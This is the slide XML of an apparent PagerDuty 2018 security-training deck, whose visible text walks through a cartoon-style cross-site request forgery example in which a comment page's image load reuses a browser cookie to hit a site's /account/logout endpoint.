                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Let’s talk about something.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1704" name="Post your favorite pictures of dogs!"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7687918" y="5545841"/>
            <a:ext cx="6412707"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200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Post your favorite pictures of dogs!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1705" name="Comment:"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6332159" y="7764462"/>
            <a:ext cx="1444254" cy="473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200">
                <a:solidFill>
                  <a:srgbClr val="53585F"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Comment:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1706" name="Rich says:"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7581656" y="3879250"/>
            <a:ext cx="1444254" cy="473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200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Rich says:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1707" name="Rich says:"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7581656" y="5137628"/>
            <a:ext cx="1444254" cy="473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200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Rich says:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1708" name="pd-user-blank.png" descr="pd-user-blank.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="17838346" y="2881453"/>
            <a:ext cx="446443" cy="446443"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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2" name="PagerDuty_logo_WHITE.png" descr="PagerDuty_logo_WHITE.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71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714" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1715" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1716" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3927083" y="4778606"/>
            <a:ext cx="4158789" cy="4158788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1717" name="www.png" descr="www.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="15672102" y="4778606"/>
            <a:ext cx="4158788" cy="4158788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1718" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8492737" y="6858000"/>
            <a:ext cx="6772500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="114300">
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1719" name="/account/logout"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9165515" y="7013254"/>
            <a:ext cx="5071493"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5200">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>/account/logout</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1720" name="session-id: dh46gs…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9135281" y="7846772"/>
            <a:ext cx="4187888"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400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>session-id: dh46gs…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1725" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1996313" y="873693"/>
            <a:ext cx="8020330" cy="1464311"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8020329" cy="1464309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1721" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="8020330" cy="1464310"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 13010"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="353535"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1722" name="Let’s go ahead and load that image."/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1266262" y="432117"/>
              <a:ext cx="6648730"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3000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Let’s go ahead and load that image.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1723" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="338667" y="305386"/>
              <a:ext cx="814898" cy="814899"/>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353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1724" name="1"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288298" y="311197"/>
              <a:ext cx="915635"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a:solidFill>
                    <a:srgbClr val="353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1730" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1996313" y="2826149"/>
            <a:ext cx="8020330" cy="1464311"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8020329" cy="1464309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1726" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="8020330" cy="1464310"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 13010"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="353535"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1727" name="Hey, I know that site! I have a cookie for it already. I can just use that!"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1266262" y="203517"/>
              <a:ext cx="6648730"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3000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Hey, I know that site! I have a cookie for it already. I can just use that!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1728" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="338667" y="305386"/>
              <a:ext cx="814898" cy="814899"/>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353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1729" name="2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288298" y="311197"/>
              <a:ext cx="915635"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a:solidFill>
                    <a:srgbClr val="353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1735" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13741364" y="9425540"/>
            <a:ext cx="8020330" cy="1464311"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8020329" cy="1464309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1731" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="8020330" cy="1464310"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 13010"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="353535"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1732" name="Oh hey, it’s you. You want to logout?…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1266262" y="203517"/>
              <a:ext cx="6648730"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sz="3000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>Oh hey, it’s you. You want to logout?</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:defRPr sz="3000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>No problem!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1733" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="338667" y="305386"/>
              <a:ext cx="814898" cy="814899"/>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353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1734" name="3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288298" y="311197"/>
              <a:ext cx="915635"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a:solidFill>
                    <a:srgbClr val="353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>3</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716"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="171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1725"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1725"/>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1730"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1730"/>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1718"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="400"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1718"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="23" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="400"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="24" presetClass="entr" nodeType="afterEffect" presetID="10" grpId="5" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="25" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1719"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1719"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="27" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="700"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="28" presetClass="entr" nodeType="afterEffect" presetID="10" grpId="6" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="29" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1720"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1720"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="31" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="32" presetClass="entr" nodeType="afterEffect" presetID="10" grpId="7" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="33" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1717"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1717"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="35" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="36" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="37" presetClass="entr" nodeType="clickEffect" presetID="10" grpId="8" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="38" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1735"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17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17" grpId="7"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1720" grpId="6"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1716" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1718" grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1725" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1735" grpId="8"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1730" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1719" grpId="5"/>
    </p:bldLst>
  </p:timing>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39"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740"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741" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1742" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
